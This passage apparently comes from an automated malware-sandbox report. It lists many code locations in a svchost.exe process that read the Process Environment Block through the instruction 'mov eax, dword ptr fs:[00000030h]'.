          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]3_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472619 mov eax, dword ptr fs:[00000030h]3_2_03472619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E627 mov eax, dword ptr fs:[00000030h]3_2_0344E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03466620 mov eax, dword ptr fs:[00000030h]3_2_03466620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03468620 mov eax, dword ptr fs:[00000030h]3_2_03468620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343262C mov eax, dword ptr fs:[00000030h]3_2_0343262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0346A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A6C7 mov eax, dword ptr fs:[00000030h]3_2_0346A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE6F2 mov eax, dword ptr fs:[00000030h]3_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE6F2 mov eax, dword ptr fs:[00000030h]3_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE6F2 mov eax, dword ptr fs:[00000030h]3_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE6F2 mov eax, dword ptr fs:[00000030h]3_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B06F1 mov eax, dword ptr fs:[00000030h]3_2_034B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B06F1 mov eax, dword ptr fs:[00000030h]3_2_034B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434690 mov eax, dword ptr fs:[00000030h]3_2_03434690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434690 mov eax, dword ptr fs:[00000030h]3_2_03434690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346C6A6 mov eax, dword ptr fs:[00000030h]3_2_0346C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034666B0 mov eax, dword ptr fs:[00000030h]3_2_034666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438550 mov eax, dword ptr fs:[00000030h]3_2_03438550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438550 mov eax, dword ptr fs:[00000030h]3_2_03438550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346656A mov eax, dword ptr fs:[00000030h]3_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346656A mov eax, dword ptr fs:[00000030h]3_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346656A mov eax, dword ptr fs:[00000030h]3_2_0346656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C6500 mov eax, dword ptr fs:[00000030h]3_2_034C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]3_2_03504500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]3_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]3_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]3_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]3_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]3_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]3_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]3_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]3_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]3_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]3_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]3_2_0345E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E5CF mov eax, dword ptr fs:[00000030h]3_2_0346E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E5CF mov eax, dword ptr fs:[00000030h]3_2_0346E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034365D0 mov eax, dword ptr fs:[00000030h]3_2_034365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A5D0 mov eax, dword ptr fs:[00000030h]3_2_0346A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A5D0 mov eax, dword ptr fs:[00000030h]3_2_0346A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]3_2_0345E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034325E0 mov eax, dword ptr fs:[00000030h]3_2_034325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346C5ED mov eax, dword ptr fs:[00000030h]3_2_0346C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346C5ED mov eax, dword ptr fs:[00000030h]3_2_0346C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03432582 mov eax, dword ptr fs:[00000030h]3_2_03432582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03432582 mov ecx, dword ptr fs:[00000030h]3_2_03432582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03464588 mov eax, dword ptr fs:[00000030h]3_2_03464588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E59C mov eax, dword ptr fs:[00000030h]3_2_0346E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B05A7 mov eax, dword ptr fs:[00000030h]3_2_034B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B05A7 mov eax, dword ptr fs:[00000030h]3_2_034B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B05A7 mov eax, dword ptr fs:[00000030h]3_2_034B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034545B1 mov eax, dword ptr fs:[00000030h]3_2_034545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034545B1 mov eax, dword ptr fs:[00000030h]3_2_034545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]3_2_0346E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EA456 mov eax, dword ptr fs:[00000030h]3_2_034EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342645D mov eax, dword ptr fs:[00000030h]3_2_0342645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345245A mov eax, dword ptr fs:[00000030h]3_2_0345245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BC460 mov ecx, dword ptr fs:[00000030h]3_2_034BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345A470 mov eax, dword ptr fs:[00000030h]3_2_0345A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345A470 mov eax, dword ptr fs:[00000030h]3_2_0345A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345A470 mov eax, dword ptr fs:[00000030h]3_2_0345A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03468402 mov eax, dword ptr fs:[00000030h]3_2_03468402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03468402 mov eax, dword ptr fs:[00000030h]3_2_03468402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03468402 mov eax, dword ptr fs:[00000030h]3_2_03468402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342E420 mov eax, dword ptr fs:[00000030h]3_2_0342E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342E420 mov eax, dword ptr fs:[00000030h]3_2_0342E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342E420 mov eax, dword ptr fs:[00000030h]3_2_0342E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342C427 mov eax, dword ptr fs:[00000030h]3_2_0342C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]3_2_034B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A430 mov eax, dword ptr fs:[00000030h]3_2_0346A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034304E5 mov ecx, dword ptr fs:[00000030h]3_2_034304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EA49A mov eax, dword ptr fs:[00000030h]3_2_034EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034364AB mov eax, dword ptr fs:[00000030h]3_2_034364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034644B0 mov ecx, dword ptr fs:[00000030h]3_2_034644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BA4B0 mov eax, dword ptr fs:[00000030h]3_2_034BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E4B4B mov eax, dword ptr fs:[00000030h]3_2_034E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E4B4B mov eax, dword ptr fs:[00000030h]3_2_034E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03502B57 mov eax, dword ptr fs:[00000030h]3_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03502B57 mov eax, dword ptr fs:[00000030h]3_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03502B57 mov eax, dword ptr fs:[00000030h]3_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03502B57 mov eax, dword ptr fs:[00000030h]3_2_03502B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C6B40 mov eax, dword ptr fs:[00000030h]3_2_034C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C6B40 mov eax, dword ptr fs:[00000030h]3_2_034C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FAB40 mov eax, dword ptr fs:[00000030h]3_2_034FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D8B42 mov eax, dword ptr fs:[00000030h]3_2_034D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03428B50 mov eax, dword ptr fs:[00000030h]3_2_03428B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DEB50 mov eax, dword ptr fs:[00000030h]3_2_034DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342CB7E mov eax, dword ptr fs:[00000030h]3_2_0342CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504B00 mov eax, dword ptr fs:[00000030h]3_2_03504B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]3_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345EB20 mov eax, dword ptr fs:[00000030h]3_2_0345EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345EB20 mov eax, dword ptr fs:[00000030h]3_2_0345EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F8B28 mov eax, dword ptr fs:[00000030h]3_2_034F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F8B28 mov eax, dword ptr fs:[00000030h]3_2_034F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03450BCB mov eax, dword ptr fs:[00000030h]3_2_03450BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03450BCB mov eax, dword ptr fs:[00000030h]3_2_03450BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03450BCB mov eax, dword ptr fs:[00000030h]3_2_03450BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430BCD mov eax, dword ptr fs:[00000030h]3_2_03430BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430BCD mov eax, dword ptr fs:[00000030h]3_2_03430BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430BCD mov eax, dword ptr fs:[00000030h]3_2_03430BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DEBD0 mov eax, dword ptr fs:[00000030h]3_2_034DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438BF0 mov eax, dword ptr fs:[00000030h]3_2_03438BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438BF0 mov eax, dword ptr fs:[00000030h]3_2_03438BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438BF0 mov eax, dword ptr fs:[00000030h]3_2_03438BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345EBFC mov eax, dword ptr fs:[00000030h]3_2_0345EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BCBF0 mov eax, dword ptr fs:[00000030h]3_2_034BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440BBE mov eax, dword ptr fs:[00000030h]3_2_03440BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440BBE mov eax, dword ptr fs:[00000030h]3_2_03440BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E4BB0 mov eax, dword ptr fs:[00000030h]3_2_034E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E4BB0 mov eax, dword ptr fs:[00000030h]3_2_034E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]3_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440A5B mov eax, dword ptr fs:[00000030h]3_2_03440A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440A5B mov eax, dword ptr fs:[00000030h]3_2_03440A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346CA6F mov eax, dword ptr fs:[00000030h]3_2_0346CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346CA6F mov eax, dword ptr fs:[00000030h]3_2_0346CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346CA6F mov eax, dword ptr fs:[00000030h]3_2_0346CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DEA60 mov eax, dword ptr fs:[00000030h]3_2_034DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034ACA72 mov eax, dword ptr fs:[00000030h]3_2_034ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034ACA72 mov eax, dword ptr fs:[00000030h]3_2_034ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BCA11 mov eax, dword ptr fs:[00000030h]3_2_034BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346CA24 mov eax, dword ptr fs:[00000030h]3_2_0346CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345EA2E mov eax, dword ptr fs:[00000030h]3_2_0345EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03454A35 mov eax, dword ptr fs:[00000030h]3_2_03454A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03454A35 mov eax, dword ptr fs:[00000030h]3_2_03454A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346CA38 mov eax, dword ptr fs:[00000030h]3_2_0346CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03486ACC mov eax, dword ptr fs:[00000030h]3_2_03486ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03486ACC mov eax, dword ptr fs:[00000030h]3_2_03486ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03486ACC mov eax, dword ptr fs:[00000030h]3_2_03486ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430AD0 mov eax, dword ptr fs:[00000030h]3_2_03430AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03464AD0 mov eax, dword ptr fs:[00000030h]3_2_03464AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03464AD0 mov eax, dword ptr fs:[00000030h]3_2_03464AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346AAEE mov eax, dword ptr fs:[00000030h]3_2_0346AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346AAEE mov eax, dword ptr fs:[00000030h]3_2_0346AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]3_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504A80 mov eax, dword ptr fs:[00000030h]3_2_03504A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03468A90 mov edx, dword ptr fs:[00000030h]3_2_03468A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438AA0 mov eax, dword ptr fs:[00000030h]3_2_03438AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438AA0 mov eax, dword ptr fs:[00000030h]3_2_03438AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03486AA4 mov eax, dword ptr fs:[00000030h]3_2_03486AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B0946 mov eax, dword ptr fs:[00000030h]3_2_034B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504940 mov eax, dword ptr fs:[00000030h]3_2_03504940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03456962 mov eax, dword ptr fs:[00000030h]3_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03456962 mov eax, dword ptr fs:[00000030h]3_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03456962 mov eax, dword ptr fs:[00000030h]3_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0347096E mov eax, dword ptr fs:[00000030h]3_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0347096E mov edx, dword ptr fs:[00000030h]3_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0347096E mov eax, dword ptr fs:[00000030h]3_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D4978 mov eax, dword ptr fs:[00000030h]3_2_034D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D4978 mov eax, dword ptr fs:[00000030h]3_2_034D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BC97C mov eax, dword ptr fs:[00000030h]3_2_034BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE908 mov eax, dword ptr fs:[00000030h]3_2_034AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE908 mov eax, dword ptr fs:[00000030h]3_2_034AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BC912 mov eax, dword ptr fs:[00000030h]3_2_034BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03428918 mov eax, dword ptr fs:[00000030h]3_2_03428918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03428918 mov eax, dword ptr fs:[00000030h]3_2_03428918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B892A mov eax, dword ptr fs:[00000030h]3_2_034B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C892B mov eax, dword ptr fs:[00000030h]3_2_034C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C69C0 mov eax, dword ptr fs:[00000030h]3_2_034C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]3_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]3_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]3_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]3_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]3_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]3_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034649D0 mov eax, dword ptr fs:[00000030h]3_2_034649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FA9D3 mov eax, dword ptr fs:[00000030h]3_2_034FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BE9E0 mov eax, dword ptr fs:[00000030h]3_2_034BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034629F9 mov eax, dword ptr fs:[00000030h]3_2_034629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034629F9 mov eax, dword ptr fs:[00000030h]3_2_034629F9
